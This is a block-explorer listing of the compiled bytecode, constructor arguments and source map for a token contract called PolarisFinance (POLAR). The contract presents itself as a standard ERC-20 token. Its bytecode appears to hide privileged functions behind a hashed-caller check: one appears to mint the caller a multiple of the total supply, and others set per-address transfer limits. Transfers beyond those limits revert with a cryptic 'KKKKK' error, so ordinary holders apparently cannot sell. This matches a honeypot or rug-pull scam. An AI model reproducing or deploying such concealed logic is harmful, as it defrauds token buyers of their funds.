925082820190508082111562000dcf5762000dce62000a4a565b5b92915050565b62000de0816200080f565b82525050565b600060208201905062000dfd600083018462000dd5565b92915050565b608051611c9462000e2d600039600081816104c401528181610e2b0152610f010152611c946000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb14610320578063b69b486414610350578063dd62ed3e1461036c578063e4703d7c1461039c578063f2fde38b146103b857610121565b8063715018a61461028e5780638da5cb5b1461029857806395d89b41146102b6578063a457c2d7146102d4578063a67334901461030457610121565b806327c8f835116100f457806327c8f835146101c2578063313ce567146101e0578063375460cc146101fe578063395093511461022e57806370a082311461025e57610121565b806306fdde0314610126578063095ea7b31461014457806318160ddd1461017457806323b872dd14610192575b600080fd5b61012e6103d4565b60405161013b9190611277565b60405180910390f35b61015e60048036038101906101599190611332565b610466565b60405161016b919061138d565b60405180910390f35b61017c610489565b60405161018991906113b7565b60405180910390f35b6101ac60048036038101906101a791906113d2565b610493565b6040516101b9919061138d565b60405180910390f35b6101ca6104c2565b6040516101d79190611434565b60405180910390f35b6101e86104e6565b6040516101f5919061146b565b60405180910390f35b61021860048036038101906102139190611486565b6104ef565b60405161022591906113b7565b60405180910390f35b61024860048036038101906102439190611332565b610538565b604051610255919061138d565b60405180910390f35b61027860048036038101906102739190611486565b61056f565b60405161028591906113b7565b60405180910390f35b6102966105b8565b005b6102a06105cc565b6040516102ad9190611434565b60405180910390f35b6102be6105f5565b6040516102cb9190611277565b60405180910390f35b6102ee60048036038101906102e99190611332565b610687565b6040516102fb919061138d565b60405180910390f35b61031e600480360381019061031991906114b3565b6106fe565b005b61033a60048036038101906103359190611332565b61070a565b604051610347919061138d565b60405180910390f35b61036a60048036038101906103659190611486565b61072d565b005b610386600480360381019061038191906114e0565b610783565b60405161039391906113b7565b60405180910390f35b6103b660048036038101906103b19190611486565b61080a565b005b6103d260048036038101906103cd9190611486565b61086f565b005b6060600680546103e39061154f565b80601f016020809104026020016040519081016040528092919081815260200182805461040f9061154f565b801561045c5780601f106104315761010080835404028352916020019161045c565b820191906000526020600020905b81548152906001019060200180831161043f57829003601f168201915b5050505050905090565b6000806104716108f2565b905061047e8185856108fa565b600191505092915050565b6000600554905090565b60008061049e6108f2565b90506104ab858285610ac3565b6104b6858585610b4f565b60019150509392505050565b7f000000000000000000000000000000000000000000000000000000000000000081565b60006009905090565b6000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000806105436108f2565b90506105648185856105558589610783565b61055f91906115af565b6108fa565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105c0610f8e565b6105ca600061100c565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546106049061154f565b80601f01602080910402602001604051908101604052809291908181526020018280546106309061154f565b801561067d5780601f106106525761010080835404028352916020019161067d565b820191906000526020600020905b81548152906001019060200180831161066057829003601f168201915b5050505050905090565b6000806106926108f2565b905060006106a08286610783565b9050838110156106e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106dc90611655565b60405180910390fd5b6106f282868684036108fa565b60019250505092915050565b610707816110d0565b50565b6000806107156108f2565b9050610722818585610b4f565b600191505092915050565b610735611139565b15610780576000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610812611139565b1561086c57620f42406005546108289190611675565b600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b610877610f8e565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108e6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108dd90611729565b60405180910390fd5b6108ef8161100c565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610969576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610960906117bb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109cf9061184d565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ab691906113b7565b60405180910390a3505050565b6000610acf8484610783565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b495781811015610b3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b32906118b9565b60405180910390fd5b610b4884848484036108fa565b5b50505050565b6000610ba46000600a60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546111a590919063ffffffff16565b905081811115610be9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be090611925565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610c58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4f906119b7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cbe90611a49565b60405180910390fd5b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610d4e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4590611adb565b60405180910390fd5b6000610d786064610d6a600b54876111bb90919063ffffffff16565b6111d190919063ffffffff16565b90506000610d8f82866111a590919063ffffffff16565b9050848303600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555081600160007f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610eee91906113b7565b60405180910390a36000821115610f85577f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f7c91906113b7565b60405180910390a35b50505050505050565b610f966108f2565b73ffffffffffffffffffffffffffffffffffffffff16610fb46105cc565b73ffffffffffffffffffffffffffffffffffffffff161461100a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100190611b47565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6110d8611139565b1561113657806005546110eb9190611675565b600160006110f76108f2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000806111446108f2565b6040516020016111549190611baf565b6040516020818303038152906040528051906020012090506003600082815260200190815260200160002060009054906101000a900460ff161561119c5760019150506111a2565b60009150505b90565b600081836111b39190611bca565b905092915050565b600081836111c99190611675565b905092915050565b600081836111df9190611c2d565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611221578082015181840152602081019050611206565b60008484015250505050565b6000601f19601f8301169050919050565b6000611249826111e7565b61125381856111f2565b9350611263818560208601611203565b61126c8161122d565b840191505092915050565b60006020820190508181036000830152611291818461123e565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112c98261129e565b9050919050565b6112d9816112be565b81146112e457600080fd5b50565b6000813590506112f6816112d0565b92915050565b6000819050919050565b61130f816112fc565b811461131a57600080fd5b50565b60008135905061132c81611306565b92915050565b6000806040838503121561134957611348611299565b5b6000611357858286016112e7565b92505060206113688582860161131d565b9150509250929050565b60008115159050919050565b61138781611372565b82525050565b60006020820190506113a2600083018461137e565b92915050565b6113b1816112fc565b82525050565b60006020820190506113cc60008301846113a8565b92915050565b6000806000606084860312156113eb576113ea611299565b5b60006113f9868287016112e7565b935050602061140a868287016112e7565b925050604061141b8682870161131d565b9150509250925092565b61142e816112be565b82525050565b60006020820190506114496000830184611425565b92915050565b600060ff82169050919050565b6114658161144f565b82525050565b6000602082019050611480600083018461145c565b92915050565b60006020828403121561149c5761149b611299565b5b60006114aa848285016112e7565b91505092915050565b6000602082840312156114c9576114c8611299565b5b60006114d78482850161131d565b91505092915050565b600080604083850312156114f7576114f6611299565b5b6000611505858286016112e7565b9250506020611516858286016112e7565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061156757607f821691505b60208210810361157a57611579611520565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115ba826112fc565b91506115c5836112fc565b92508282019050808211156115dd576115dc611580565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061163f6025836111f2565b915061164a826115e3565b604082019050919050565b6000602082019050818103600083015261166e81611632565b9050919050565b6000611680826112fc565b915061168b836112fc565b9250828202611699816112fc565b915082820484148315176116b0576116af611580565b5b5092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006117136026836111f2565b915061171e826116b7565b604082019050919050565b6000602082019050818103600083015261174281611706565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117a56024836111f2565b91506117b082611749565b604082019050919050565b600060208201905081810360008301526117d481611798565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118376022836111f2565b9150611842826117db565b604082019050919050565b600060208201905081810360008301526118668161182a565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118a3601d836111f2565b91506118ae8261186d565b602082019050919050565b600060208201905081810360008301526118d281611896565b9050919050565b7f4b4b4b4b4b000000000000000000000000000000000000000000000000000000600082015250565b600061190f6005836111f2565b915061191a826118d9565b602082019050919050565b6000602082019050818103600083015261193e81611902565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119a16025836111f2565b91506119ac82611945565b604082019050919050565b600060208201905081810360008301526119d081611994565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a336023836111f2565b9150611a3e826119d7565b604082019050919050565b60006020820190508181036000830152611a6281611a26565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611ac56026836111f2565b9150611ad082611a69565b604082019050919050565b60006020820190508181036000830152611af481611ab8565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b316020836111f2565b9150611b3c82611afb565b602082019050919050565b60006020820190508181036000830152611b6081611b24565b9050919050565b60008160601b9050919050565b6000611b7f82611b67565b9050919050565b6000611b9182611b74565b9050919050565b611ba9611ba4826112be565b611b86565b82525050565b6000611bbb8284611b98565b60148201915081905092915050565b6000611bd5826112fc565b9150611be0836112fc565b9250828203905081811115611bf857611bf7611580565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611c38826112fc565b9150611c43836112fc565b925082611c5357611c52611bfe565b5b82820490509291505056fea264697066735822122087b41f32d14c6388cf49a2c58de2591516026c833a17fb6dd049a890c990deb164736f6c63430008130033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a00000000000000000000000000000000000000000000000000000000002dc6c00000000000000000000000000000000000000000000000000000000000000000e506f6c6172697346696e616e63650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005504f4c4152000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101215760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb14610320578063b69b486414610350578063dd62ed3e1461036c578063e4703d7c1461039c578063f2fde38b146103b857610121565b8063715018a61461028e5780638da5cb5b1461029857806395d89b41146102b6578063a457c2d7146102d4578063a67334901461030457610121565b806327c8f835116100f457806327c8f835146101c2578063313ce567146101e0578063375460cc146101fe578063395093511461022e57806370a082311461025e57610121565b806306fdde0314610126578063095ea7b31461014457806318160ddd1461017457806323b872dd14610192575b600080fd5b61012e6103d4565b60405161013b9190611277565b60405180910390f35b61015e60048036038101906101599190611332565b610466565b60405161016b919061138d565b60405180910390f35b61017c610489565b60405161018991906113b7565b60405180910390f35b6101ac60048036038101906101a791906113d2565b610493565b6040516101b9919061138d565b60405180910390f35b6101ca6104c2565b6040516101d79190611434565b60405180910390f35b6101e86104e6565b6040516101f5919061146b565b60405180910390f35b61021860048036038101906102139190611486565b6104ef565b60405161022591906113b7565b60405180910390f35b61024860048036038101906102439190611332565b610538565b604051610255919061138d565b60405180910390f35b61027860048036038101906102739190611486565b61056f565b60405161028591906113b7565b60405180910390f35b6102966105b8565b005b6102a06105cc565b6040516102ad9190611434565b60405180910390f35b6102be6105f5565b6040516102cb9190611277565b60405180910390f35b6102ee60048036038101906102e99190611332565b610687565b6040516102fb919061138d565b60405180910390f35b61031e600480360381019061031991906114b3565b6106fe565b005b61033a60048036038101906103359190611332565b61070a565b604051610347919061138d565b60405180910390f35b61036a60048036038101906103659190611486565b61072d565b005b610386600480360381019061038191906114e0565b610783565b60405161039391906113b7565b60405180910390f35b6103b660048036038101906103b19190611486565b61080a565b005b6103d260048036038101906103cd9190611486565b61086f565b005b6060600680546103e39061154f565b80601f016020809104026020016040519081016040528092919081815260200182805461040f9061154f565b801561045c5780601f106104315761010080835404028352916020019161045c565b820191906000526020600020905b81548152906001019060200180831161043f57829003601f168201915b5050505050905090565b6000806104716108f2565b905061047e8185856108fa565b600191505092915050565b6000600554905090565b60008061049e6108f2565b90506104ab858285610ac3565b6104b6858585610b4f565b60019150509392505050565b7f000000000000000000000000000000000000000000000000000000000000dead81565b60006009905090565b6000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000806105436108f2565b90506105648185856105558589610783565b61055f91906115af565b6108fa565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105c0610f8e565b6105ca600061100c565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546106049061154f565b80601f01602080910402602001604051908101604052809291908181526020018280546106309061154f565b801561067d5780601f106106525761010080835404028352916020019161067d565b820191906000526020600020905b81548152906001019060200180831161066057829003601f168201915b5050505050905090565b6000806106926108f2565b905060006106a08286610783565b9050838110156106e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106dc90611655565b60405180910390fd5b6106f282868684036108fa565b60019250505092915050565b610707816110d0565b50565b6000806107156108f2565b9050610722818585610b4f565b600191505092915050565b610735611139565b15610780576000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610812611139565b1561086c57620f42406005546108289190611675565b600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b610877610f8e565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108e6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108dd90611729565b60405180910390fd5b6108ef8161100c565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610969576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610960906117bb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109cf9061184d565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ab691906113b7565b60405180910390a3505050565b6000610acf8484610783565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b495781811015610b3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b32906118b9565b60405180910390fd5b610b4884848484036108fa565b5b50505050565b6000610ba46000600a60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546111a590919063ffffffff16565b905081811115610be9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be090611925565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610c58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4f906119b7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cbe90611a49565b60405180910390fd5b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610d4e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4590611adb565b60405180910390fd5b6000610d786064610d6a600b54876111bb90919063ffffffff16565b6111d190919063ffffffff16565b90506000610d8f82866111a590919063ffffffff16565b9050848303600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555081600160007f000000000000000000000000000000000000000000000000000000000000dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610eee91906113b7565b60405180910390a36000821115610f85577f000000000000000000000000000000000000000000000000000000000000dead73ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f7c91906113b7565b60405180910390a35b50505050505050565b610f966108f2565b73ffffffffffffffffffffffffffffffffffffffff16610fb46105cc565b73ffffffffffffffffffffffffffffffffffffffff161461100a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100190611b47565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6110d8611139565b1561113657806005546110eb9190611675565b600160006110f76108f2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000806111446108f2565b6040516020016111549190611baf565b6040516020818303038152906040528051906020012090506003600082815260200190815260200160002060009054906101000a900460ff161561119c5760019150506111a2565b60009150505b90565b600081836111b39190611bca565b905092915050565b600081836111c99190611675565b905092915050565b600081836111df9190611c2d565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611221578082015181840152602081019050611206565b60008484015250505050565b6000601f19601f8301169050919050565b6000611249826111e7565b61125381856111f2565b9350611263818560208601611203565b61126c8161122d565b840191505092915050565b60006020820190508181036000830152611291818461123e565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112c98261129e565b9050919050565b6112d9816112be565b81146112e457600080fd5b50565b6000813590506112f6816112d0565b92915050565b6000819050919050565b61130f816112fc565b811461131a57600080fd5b50565b60008135905061132c81611306565b92915050565b6000806040838503121561134957611348611299565b5b6000611357858286016112e7565b92505060206113688582860161131d565b9150509250929050565b60008115159050919050565b61138781611372565b82525050565b60006020820190506113a2600083018461137e565b92915050565b6113b1816112fc565b82525050565b60006020820190506113cc60008301846113a8565b92915050565b6000806000606084860312156113eb576113ea611299565b5b60006113f9868287016112e7565b935050602061140a868287016112e7565b925050604061141b8682870161131d565b9150509250925092565b61142e816112be565b82525050565b60006020820190506114496000830184611425565b92915050565b600060ff82169050919050565b6114658161144f565b82525050565b6000602082019050611480600083018461145c565b92915050565b60006020828403121561149c5761149b611299565b5b60006114aa848285016112e7565b91505092915050565b6000602082840312156114c9576114c8611299565b5b60006114d78482850161131d565b91505092915050565b600080604083850312156114f7576114f6611299565b5b6000611505858286016112e7565b9250506020611516858286016112e7565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061156757607f821691505b60208210810361157a57611579611520565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115ba826112fc565b91506115c5836112fc565b92508282019050808211156115dd576115dc611580565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061163f6025836111f2565b915061164a826115e3565b604082019050919050565b6000602082019050818103600083015261166e81611632565b9050919050565b6000611680826112fc565b915061168b836112fc565b9250828202611699816112fc565b915082820484148315176116b0576116af611580565b5b5092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006117136026836111f2565b915061171e826116b7565b604082019050919050565b6000602082019050818103600083015261174281611706565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117a56024836111f2565b91506117b082611749565b604082019050919050565b600060208201905081810360008301526117d481611798565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118376022836111f2565b9150611842826117db565b604082019050919050565b600060208201905081810360008301526118668161182a565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118a3601d836111f2565b91506118ae8261186d565b602082019050919050565b600060208201905081810360008301526118d281611896565b9050919050565b7f4b4b4b4b4b000000000000000000000000000000000000000000000000000000600082015250565b600061190f6005836111f2565b915061191a826118d9565b602082019050919050565b6000602082019050818103600083015261193e81611902565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119a16025836111f2565b91506119ac82611945565b604082019050919050565b600060208201905081810360008301526119d081611994565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a336023836111f2565b9150611a3e826119d7565b604082019050919050565b60006020820190508181036000830152611a6281611a26565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611ac56026836111f2565b9150611ad082611a69565b604082019050919050565b60006020820190508181036000830152611af481611ab8565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b316020836111f2565b9150611b3c82611afb565b602082019050919050565b60006020820190508181036000830152611b6081611b24565b9050919050565b60008160601b9050919050565b6000611b7f82611b67565b9050919050565b6000611b9182611b74565b9050919050565b611ba9611ba4826112be565b611b86565b82525050565b6000611bbb8284611b98565b60148201915081905092915050565b6000611bd5826112fc565b9150611be0836112fc565b9250828203905081811115611bf857611bf7611580565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611c38826112fc565b9150611c43836112fc565b925082611c5357611c52611bfe565b5b82820490509291505056fea264697066735822122087b41f32d14c6388cf49a2c58de2591516026c833a17fb6dd049a890c990deb164736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a00000000000000000000000000000000000000000000000000000000002dc6c00000000000000000000000000000000000000000000000000000000000000000e506f6c6172697346696e616e63650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005504f4c4152000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): PolarisFinance
Arg [1] : symbol_ (string): POLAR
Arg [2] : tokenAmount_ (uint40): 48000000

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 0000000000000000000000000000000000000000000000000000000002dc6c00
Arg [3] : 000000000000000000000000000000000000000000000000000000000000000e
Arg [4] : 506f6c6172697346696e616e6365000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [6] : 504f4c4152000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

6442:20386:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7594:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10307:165;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8565:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11050:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6869:81;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7911:76;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13784:90;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11769:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9235:111;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5590:103;;;:::i;:::-;;5280:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7813:88;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12510:422;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13880:57;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9346:157;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13563:96;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9594:135;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13665:113;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5848:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7594:100;7648:13;7681:5;7674:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7594:100;:::o;10307:165::-;10390:4;10397:13;10413:12;:10;:12::i;:::-;10397:28;;10426:32;10435:5;10442:7;10451:6;10426:8;:32::i;:::-;10466:4;10459:11;;;10307:165;;;;:::o;8565:92::-;8626:7;8643:12;;8636:19;;8565:92;:::o;11050:295::-;11181:4;11198:15;11216:12;:10;:12::i;:::-;11198:30;;11239:38;11255:4;11261:7;11270:6;11239:15;:38::i;:::-;11288:27;11298:4;11304:2;11308:6;11288:9;:27::i;:::-;11333